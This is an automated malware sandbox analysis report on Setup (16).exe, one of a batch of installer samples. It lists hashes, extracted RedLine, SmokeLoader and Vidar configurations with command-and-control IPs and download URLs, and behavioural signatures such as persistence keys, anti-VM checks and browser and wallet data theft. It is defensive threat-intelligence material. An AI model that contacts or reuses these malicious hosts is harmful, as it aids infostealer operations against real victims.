Overview
overview
10Static
static
Setup (1).exe
windows7_x64
10Setup (1).exe
windows10_x64
10Setup (10).exe
windows7_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows7_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows7_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows7_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows7_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows7_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows7_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows7_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows7_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows7_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows7_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows7_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows7_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows7_x64
Setup (22).exe
windows10_x64
10Setup (23).exe
windows7_x64
10Setup (23).exe
windows10_x64
10Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
833s -
max time network
1818s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
22-08-2021 14:32
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Setup (1).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
Setup (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
Setup (10).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
Setup (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Setup (12).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
Setup (12).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (13).exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
Setup (13).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
Setup (14).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
Setup (15).exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (16).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
Setup (17).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
Setup (17).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
Setup (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
Setup (19).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
Setup (19).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
Setup (2).exe
Resource
win7v20210408
Behavioral task
behavioral24
Sample
Setup (2).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
Setup (20).exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
Setup (21).exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
Setup (23).exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
Setup (23).exe
Resource
win10v20210408
General
-
Target
Setup (16).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
193.56.146.60:51431
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
-
profile_id
937
Extracted
metasploit
windows/single_exec
Extracted
redline
build1
91.142.77.189:59638
Extracted
redline
1
37.0.8.88:44263
Extracted
redline
Ayrelia1_installs
77.83.175.169:11490
Signatures
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral16/memory/1764-298-0x00000000048C0000-0x00000000051E6000-memory.dmp family_glupteba behavioral16/memory/1764-303-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6060 4912 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5420 4912 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8240 4912 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6212 4912 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 11 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\szjOvCqo9VEEZPC9Tfhj3aWF.exe family_redline behavioral16/memory/2204-150-0x00000000048F0000-0x0000000004DEE000-memory.dmp family_redline C:\Users\Admin\Documents\szjOvCqo9VEEZPC9Tfhj3aWF.exe family_redline behavioral16/memory/772-193-0x000000000041A5EA-mapping.dmp family_redline behavioral16/memory/3688-228-0x0000000003F80000-0x0000000003F9D000-memory.dmp family_redline behavioral16/memory/584-257-0x00000000043B0000-0x00000000043CA000-memory.dmp family_redline behavioral16/memory/584-244-0x0000000004150000-0x000000000416C000-memory.dmp family_redline behavioral16/memory/3688-239-0x0000000004210000-0x000000000422C000-memory.dmp family_redline behavioral16/memory/772-190-0x0000000000400000-0x0000000000448000-memory.dmp family_redline behavioral16/memory/3252-321-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral16/memory/3252-322-0x000000000041A92A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4420 created 3800 4420 WerFault.exe K2F3HK3oxaqe4XumGVM8K2CN.exe PID 6996 created 512 6996 WerFault.exe customer3.exe PID 5236 created 7152 5236 WerFault.exe 4qT_ZXYUxFI9rinCIBBgh5r1.exe PID 7468 created 5472 7468 WerFault.exe k4UovMAQmmQbmhxqLe6V1i_X.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 5240 created 1764 5240 svchost.exe Esplorarne.exe.com PID 5240 created 5192 5240 svchost.exe Esplorarne.exe.com -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral16/memory/1248-266-0x0000000004060000-0x00000000040FD000-memory.dmp family_vidar behavioral16/memory/1248-280-0x0000000000400000-0x0000000002402000-memory.dmp family_vidar -
Blocklisted process makes network request 60 IoCs
Processes:
rundll32.exeMsiExec.exeRUNDLL32.EXEflow pid process 586 4580 rundll32.exe 640 8404 MsiExec.exe 649 8404 MsiExec.exe 655 8404 MsiExec.exe 660 8404 MsiExec.exe 663 8404 MsiExec.exe 679 8056 RUNDLL32.EXE 686 8056 RUNDLL32.EXE 687 8056 RUNDLL32.EXE 713 8056 RUNDLL32.EXE 715 8056 RUNDLL32.EXE 716 8056 RUNDLL32.EXE 721 8056 RUNDLL32.EXE 722 8056 RUNDLL32.EXE 723 8056 RUNDLL32.EXE 724 8056 RUNDLL32.EXE 726 8056 RUNDLL32.EXE 727 8056 RUNDLL32.EXE 734 8056 RUNDLL32.EXE 737 8056 RUNDLL32.EXE 738 8056 RUNDLL32.EXE 739 8056 RUNDLL32.EXE 741 8056 RUNDLL32.EXE 748 8056 RUNDLL32.EXE 765 8056 RUNDLL32.EXE 768 8056 RUNDLL32.EXE 773 8056 RUNDLL32.EXE 686 8056 RUNDLL32.EXE 640 8404 MsiExec.exe 660 8404 MsiExec.exe 663 8404 MsiExec.exe 655 8404 MsiExec.exe 649 8404 MsiExec.exe 987 8056 RUNDLL32.EXE 1028 8056 RUNDLL32.EXE 686 8056 RUNDLL32.EXE 686 8056 RUNDLL32.EXE 686 8056 RUNDLL32.EXE 686 8056 RUNDLL32.EXE 1251 8056 RUNDLL32.EXE 1323 8056 RUNDLL32.EXE 1324 8056 RUNDLL32.EXE 1393 8056 RUNDLL32.EXE 1433 8056 RUNDLL32.EXE 1435 8056 RUNDLL32.EXE 1439 8056 RUNDLL32.EXE 1448 8056 RUNDLL32.EXE 1479 8056 RUNDLL32.EXE 1481 8056 RUNDLL32.EXE 1492 8056 RUNDLL32.EXE 1493 8056 RUNDLL32.EXE 1602 8056 RUNDLL32.EXE 1603 8056 RUNDLL32.EXE 1613 8056 RUNDLL32.EXE 1676 8056 RUNDLL32.EXE 1692 8056 RUNDLL32.EXE 1695 8056 RUNDLL32.EXE 1697 8056 RUNDLL32.EXE 1725 8056 RUNDLL32.EXE 1726 8056 RUNDLL32.EXE -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
Processes:
3377047_logo_media.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe File opened for modification C:\Windows\System32\drivers\SET117D.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET117D.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
Qv0NxjyB_7TwiACykTPQ3vaQ.exe76D9MXWXSFxmg9B1iuFaSEs0.exe0iH1ZoEGEfyOl63MBMIV3FJl.exeFrOT7ywwiOn3pZMpUygcU_Xj.exeQ5cDgQSeXWc9DEicqlskiRMy.exepihzVpjsMBxeP2HpzjpDHV4j.exeu_WsNa6cDylZ6Kk8IXnl9Dwe.exeO1bmzy6hcL_ue4W6_oFG7oRj.exeszjOvCqo9VEEZPC9Tfhj3aWF.exerejtRzn8M6moTkkzPiqh5X1M.exeK2F3HK3oxaqe4XumGVM8K2CN.exeep_w4UBkXtmsr5S8c_BCYuj9.exe7TAW5mYXsk9p20DliYoWKdYO.exe9AU9I15CCD6EpK299hgTkZdS.exelDjuHqMg4MkTM1qdSGZyxIsk.exeYrpxH5F8UH0Rr76g0v7Av5_I.exeQv0NxjyB_7TwiACykTPQ3vaQ.exeZ3gXMcAFuW2Jb_9JpfQ0VRMd.exeTg0MZP2Rwd8_X1BaskraQAmY.exeERnyngf0jZ4AXCtsC6Vzb5fr.exeQv0NxjyB_7TwiACykTPQ3vaQ.exeConhost.exepihzVpjsMBxeP2HpzjpDHV4j.exeBfBxd79SbWYrnSnDsotyYWPf.tmpjooyu.exemd8_8eus.exeEsplorarne.exe.comcustomer3.exe0iH1ZoEGEfyOl63MBMIV3FJl.exe8272687.exe4904915.exe1921738.exe7330856.exejfiag3g_gg.exeSetup.exeWinHoster.exehBS_VbW.EXErunvd.exeInlog.exeCleaner Installation.exeWEATHER Manager.exetimeout.exedllhost.exeWEATHER Manager.tmpaskinstall53.exeEsplorarne.exe.com11111.exePBrowFile15.exezhaoy-game.exeVPN.tmpLivelyScreenRecS1.9.exextect12.exeMediaBurner2.tmpjfiag3g_gg.exe11111.exe11111.exezhaoy-game.exe11111.exe2142900.exeSetup.exe5964124.exe2117111.exe3377047_logo_media.exe7831575.exepid process 500 Qv0NxjyB_7TwiACykTPQ3vaQ.exe 3536 76D9MXWXSFxmg9B1iuFaSEs0.exe 2204 0iH1ZoEGEfyOl63MBMIV3FJl.exe 584 FrOT7ywwiOn3pZMpUygcU_Xj.exe 3688 Q5cDgQSeXWc9DEicqlskiRMy.exe 3696 pihzVpjsMBxeP2HpzjpDHV4j.exe 4064 u_WsNa6cDylZ6Kk8IXnl9Dwe.exe 1388 O1bmzy6hcL_ue4W6_oFG7oRj.exe 1792 szjOvCqo9VEEZPC9Tfhj3aWF.exe 1764 rejtRzn8M6moTkkzPiqh5X1M.exe 3800 K2F3HK3oxaqe4XumGVM8K2CN.exe 1248 ep_w4UBkXtmsr5S8c_BCYuj9.exe 3300 7TAW5mYXsk9p20DliYoWKdYO.exe 2276 9AU9I15CCD6EpK299hgTkZdS.exe 1108 lDjuHqMg4MkTM1qdSGZyxIsk.exe 1576 YrpxH5F8UH0Rr76g0v7Av5_I.exe 3828 Qv0NxjyB_7TwiACykTPQ3vaQ.exe 1900 Z3gXMcAFuW2Jb_9JpfQ0VRMd.exe 3932 Tg0MZP2Rwd8_X1BaskraQAmY.exe 1928 ERnyngf0jZ4AXCtsC6Vzb5fr.exe 772 Qv0NxjyB_7TwiACykTPQ3vaQ.exe 4244 Conhost.exe 4268 pihzVpjsMBxeP2HpzjpDHV4j.exe 4400 BfBxd79SbWYrnSnDsotyYWPf.tmp 1036 jooyu.exe 4240 md8_8eus.exe 3012 Esplorarne.exe.com 512 customer3.exe 3252 0iH1ZoEGEfyOl63MBMIV3FJl.exe 3208 8272687.exe 4712 4904915.exe 4824 1921738.exe 3860 7330856.exe 4644 jfiag3g_gg.exe 4024 Setup.exe 4648 WinHoster.exe 500 hBS_VbW.EXE 4788 runvd.exe 5136 Inlog.exe 5168 Cleaner Installation.exe 5224 WEATHER Manager.exe 5332 timeout.exe 5348 dllhost.exe 5360 WEATHER Manager.tmp 5384 askinstall53.exe 5456 Esplorarne.exe.com 5504 11111.exe 5512 PBrowFile15.exe 5556 zhaoy-game.exe 5576 VPN.tmp 5612 LivelyScreenRecS1.9.exe 5672 xtect12.exe 5712 MediaBurner2.tmp 5864 jfiag3g_gg.exe 5464 11111.exe 5784 11111.exe 6276 zhaoy-game.exe 6576 11111.exe 6704 2142900.exe 6712 Setup.exe 6772 5964124.exe 6792 2117111.exe 6856 3377047_logo_media.exe 6864 7831575.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
B2D5.exec5qWDS3aQr1E9rlSpJ4auzrA.exeECvDauLMIp4oydGLLNSJGk70.exeszjOvCqo9VEEZPC9Tfhj3aWF.exeERnyngf0jZ4AXCtsC6Vzb5fr.exeo0Ijha8Q2DH1BTZIg1gYYTJV.exeO1bmzy6hcL_ue4W6_oFG7oRj.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B2D5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B2D5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c5qWDS3aQr1E9rlSpJ4auzrA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c5qWDS3aQr1E9rlSpJ4auzrA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ECvDauLMIp4oydGLLNSJGk70.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ECvDauLMIp4oydGLLNSJGk70.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion szjOvCqo9VEEZPC9Tfhj3aWF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ERnyngf0jZ4AXCtsC6Vzb5fr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion o0Ijha8Q2DH1BTZIg1gYYTJV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ERnyngf0jZ4AXCtsC6Vzb5fr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion o0Ijha8Q2DH1BTZIg1gYYTJV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion O1bmzy6hcL_ue4W6_oFG7oRj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion O1bmzy6hcL_ue4W6_oFG7oRj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion szjOvCqo9VEEZPC9Tfhj3aWF.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Setup (16).exextect12.exeEsplorarne.exe.comcmd.exeWeather.exeWeather.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Setup (16).exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation xtect12.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Esplorarne.exe.com Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Weather.exe -
Loads dropped DLL 64 IoCs
Processes:
BfBxd79SbWYrnSnDsotyYWPf.tmpep_w4UBkXtmsr5S8c_BCYuj9.exeWEATHER Manager.tmpdllhost.exeCleaner Installation.exeVPN.tmpMediaBurner2.tmprundll32.exeSetup.exerunvd.exerundll32.exerundll32.exeSetup.tmpSetup.tmp6hwbhPS0ueyEdNW1h1g_ykqO.tmprundll32.exeLQpkvFjI8aWyyhYArcEYGJhT.exeMsiExec.exeGameBoxWin64.exeMsiExec.exerundll32.exerundll32.exerundll32.exeMsiExec.exeMsiExec.exeRUNDLL32.EXERUNDLL32.EXErundll32.exe880A.exeRUNDLL32.EXEmask_svc.exepid process 4400 BfBxd79SbWYrnSnDsotyYWPf.tmp 4400 BfBxd79SbWYrnSnDsotyYWPf.tmp 1248 ep_w4UBkXtmsr5S8c_BCYuj9.exe 1248 ep_w4UBkXtmsr5S8c_BCYuj9.exe 5360 WEATHER Manager.tmp 5360 WEATHER Manager.tmp 5348 dllhost.exe 5348 dllhost.exe 5168 Cleaner Installation.exe 5576 VPN.tmp 5576 VPN.tmp 5712 MediaBurner2.tmp 6076 rundll32.exe 6712 Setup.exe 4788 runvd.exe 4788 runvd.exe 6880 rundll32.exe 4580 rundll32.exe 5204 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 6020 6hwbhPS0ueyEdNW1h1g_ykqO.tmp 6020 6hwbhPS0ueyEdNW1h1g_ykqO.tmp 5732 rundll32.exe 5944 LQpkvFjI8aWyyhYArcEYGJhT.exe 5944 LQpkvFjI8aWyyhYArcEYGJhT.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 5160 GameBoxWin64.exe 5160 GameBoxWin64.exe 3636 MsiExec.exe 3636 MsiExec.exe 8260 rundll32.exe 5160 GameBoxWin64.exe 8876 rundll32.exe 8876 rundll32.exe 7432 rundll32.exe 8404 MsiExec.exe 8404 MsiExec.exe 8404 MsiExec.exe 8404 MsiExec.exe 8404 MsiExec.exe 8404 MsiExec.exe 9152 MsiExec.exe 8056 RUNDLL32.EXE 8056 RUNDLL32.EXE 9152 MsiExec.exe 8404 MsiExec.exe 8404 MsiExec.exe 8404 MsiExec.exe 1952 RUNDLL32.EXE 8404 MsiExec.exe 8532 rundll32.exe 6836 880A.exe 1840 RUNDLL32.EXE 9168 mask_svc.exe 9168 mask_svc.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\O1bmzy6hcL_ue4W6_oFG7oRj.exe themida C:\Users\Admin\Documents\O1bmzy6hcL_ue4W6_oFG7oRj.exe themida C:\Users\Admin\Documents\szjOvCqo9VEEZPC9Tfhj3aWF.exe themida C:\Users\Admin\Documents\szjOvCqo9VEEZPC9Tfhj3aWF.exe themida behavioral16/memory/1388-161-0x0000000000230000-0x0000000000231000-memory.dmp themida C:\Users\Admin\Documents\ERnyngf0jZ4AXCtsC6Vzb5fr.exe themida C:\Users\Admin\Documents\ERnyngf0jZ4AXCtsC6Vzb5fr.exe themida behavioral16/memory/1792-227-0x0000000000D50000-0x0000000000D51000-memory.dmp themida behavioral16/memory/1928-245-0x0000000000E50000-0x0000000000E51000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
Esplorarne.exe.comEsplorarne.exe.com4904915.exe3377047_logo_media.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Esplorarne.exe.com Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Esplorarne.exe.com Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --Ac4FtzsAeC" Esplorarne.exe.com Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4904915.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Lymatisucy.exe\"" 3377047_logo_media.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run Esplorarne.exe.com -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
szjOvCqo9VEEZPC9Tfhj3aWF.exeERnyngf0jZ4AXCtsC6Vzb5fr.exeEsplorarne.exe.commd8_8eus.exeo0Ijha8Q2DH1BTZIg1gYYTJV.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comO1bmzy6hcL_ue4W6_oFG7oRj.exec5qWDS3aQr1E9rlSpJ4auzrA.exeB2D5.exeEsplorarne.exe.comECvDauLMIp4oydGLLNSJGk70.exedcwjjwvEsplorarne.exe.comdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA szjOvCqo9VEEZPC9Tfhj3aWF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ERnyngf0jZ4AXCtsC6Vzb5fr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o0Ijha8Q2DH1BTZIg1gYYTJV.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA O1bmzy6hcL_ue4W6_oFG7oRj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA c5qWDS3aQr1E9rlSpJ4auzrA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B2D5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ECvDauLMIp4oydGLLNSJGk70.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dcwjjwv Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Cleaner Installation.exeSetup.exeGameBoxWin64.exemsiexec.exedescription ioc process File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\O: GameBoxWin64.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\A: GameBoxWin64.exe File opened (read-only) \??\S: GameBoxWin64.exe File opened (read-only) \??\W: GameBoxWin64.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: GameBoxWin64.exe File opened (read-only) \??\Z: Cleaner Installation.exe File opened (read-only) \??\B: Setup.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\Z: Setup.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\A: Setup.exe File opened (read-only) \??\H: Setup.exe File opened (read-only) \??\J: Setup.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\U: GameBoxWin64.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\H: GameBoxWin64.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\L: GameBoxWin64.exe File opened (read-only) \??\N: GameBoxWin64.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\X: Setup.exe File opened (read-only) \??\E: Setup.exe File opened (read-only) \??\F: Setup.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: GameBoxWin64.exe File opened (read-only) \??\J: GameBoxWin64.exe File opened (read-only) \??\M: GameBoxWin64.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: GameBoxWin64.exe File opened (read-only) \??\T: Setup.exe File opened (read-only) \??\Y: Setup.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 422 ipinfo.io 428 ipinfo.io 31 ipinfo.io 133 ipinfo.io 219 ipinfo.io 206 ipinfo.io 209 ipinfo.io 218 ipinfo.io 266 ipinfo.io 32 ipinfo.io 127 ipinfo.io 152 ip-api.com -
Drops file in System32 directory 22 IoCs
Processes:
